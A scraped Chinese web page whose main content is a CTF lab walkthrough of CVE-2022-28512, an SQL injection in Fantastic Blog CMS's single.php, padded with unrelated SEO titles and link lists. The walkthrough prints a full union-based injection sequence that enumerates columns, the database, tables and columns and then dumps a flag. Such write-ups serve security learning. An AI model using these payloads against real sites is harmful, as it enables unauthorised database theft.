当前位置: 首页 > news >正文

大型的营销型网站建设怎么选择网站建设公司

大型的营销型网站建设,怎么选择网站建设公司,东莞网站建设最牛,单页网站模板修改吗文章目录 前言一、CVE-2022-28512靶场简述二、找注入点三、CVE-2022-28512漏洞复现1、判断注入点2、爆显位个数3、爆显位位置4 、爆数据库名5、爆数据库表名6、爆数据库列名7、爆数据库数据 总结 前言 此文章只用于学习和反思巩固sql注入知识#xff0c;禁止用于做非法攻击。… 文章目录 前言一、CVE-2022-28512靶场简述二、找注入点三、CVE-2022-28512漏洞复现1、判断注入点2、爆显位个数3、爆显位位置4 、爆数据库名5、爆数据库表名6、爆数据库列名7、爆数据库数据 总结 前言 此文章只用于学习和反思巩固sql注入知识禁止用于做非法攻击。注意靶场是可以练习的平台不能随意去尚未授权的网站做渗透测试 一、CVE-2022-28512靶场简述 Sourcecodester Fantastic Blog CMS 1.0 中存在一个 SQL 注入漏洞。攻击者可以通过“id5”参数在“/fantasticblog/single.php”中注入查询。 二、找注入点 Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下id参数存在一个SQL注入漏洞。 我们就尝试找single.php的界面。 打开发现是有一个登录框和一个登录注册。但是登录框是search.php,而且尝试sql注入也是无果。(如图所示) 点开图片发现跳转到single.php界面成功找到注入地方(如图所示) 三、CVE-2022-28512漏洞复现 1、判断注入点2、爆显位个数3、爆显位位置4、爆数据库名5、爆数据库表名6、爆数据库列名7、爆数据库数据 1、判断注入点 (如图所示)这里我们老规矩抛出and 11 和 and 12测试。发现页面依旧正常排除数字型。直接提交3’发现报错报错信息为 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘3’’’ at line 1 通过报错信息可以知道是单引号闭合这里构造的payload为 id3--2、爆显位个数 注入语句为 id3 order by 9--发现为10的时候报错那么显位个数是9了。 3、爆显位位置 注入语句为 id-3 union select 1,2,3,4,5,6,7,8,9--发现有4可以注入我就在4注入了 4 、爆数据库名 注入语句为 id-3 union select 1,2,3,database(),5,6,7,8,9--得到数据库ctf 5、爆数据库表名 注入语句为 id-3 union select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schemadatabase()--得到数据库表名 titles,page_hits,membership_userpermissions,membership_groups,blog_categories,membership_userrecords,membership_users,editors_choice,blogs,links,flag,banner_posts,membership_grouppermissions,visitor_info 关键表名是flag 6、爆数据库列名 注入语句为 id-3 union select 1,2,3,group_concat(column_name),5,6,7,8,9 from information_schema.columns where table_schemadatabase() and table_nameflag--得到列名flag 7、爆数据库数据 注入语句为 id-3 union select 1,2,3,group_concat(flag),5,6,7,8,9 from flag --得到flag flag{6bf76a30-c821-429b-b2e7-03b6068cdf36} 总结 这一关的信息收集比较简单一下子找到注入点了。这是一个简单的单引号闭合简单注入极其简单。此文章是小白自己为了巩固sql注入而写的大佬路过请多指教
http://www.zqtcl.cn/news/733829/

相关文章:

  • 怎么用网站源码建站友情链接交换方式有哪些
  • 国外免费网站服务器链接幼教网站建设分析
  • 做药品网站有哪些陕西专业网站建设价格
  • 网络公司做网站网站 服务器选择
  • 湖南省重点建设项目办公室网站河南省住建局官网
  • 建设网站企业网上银行登录入口官方论坛系统
  • 嘉定建设机械网站合肥制作网页设计
  • 外链网站有哪些空港经济区内的建设工程网站
  • 企业网站开发价阿里云快速备份网站
  • 大型电子商务网站建设成本ai网页生成
  • 网页播放视频 网站开发常用网站搜索引擎
  • 制作一个购物网站要多少钱做创意小视频的网站
  • 淇县网站建设软件定制流程
  • 17网站一起做网店代发流程wordpress悬浮 联系
  • 如何查网站外链快速开发平台 免费开源
  • 做网站有哪些流程怎么做网站电影
  • 做街机棋牌上什么网站发广告网站策划和运营
  • 建网站是什么专业类别阳江网红人物
  • 网站建设工作描述株洲市建设质监站网站
  • 做网站 橙色怎么搭配吐鲁番市网站建设
  • 企业信息网站衡阳高端网站建设
  • 中小学网站建设小程序开发费用是多少
  • 网站开发项目可行性分析单位logo设计
  • 做最好的美食分享网站网站源码网站
  • 宝塔搭建app教程360优化大师下载
  • 杭州网站制作 乐云践新开发公司竣工员工奖励计划
  • 绍兴市越城区建设局网站网站策划运营方案书
  • 怎么查网站备案信息查询wordpress 新安装 慢
  • 做一个卖东西的网站深圳市住房和建设局网站变更
  • 一个公司做几个网站绵阳房产网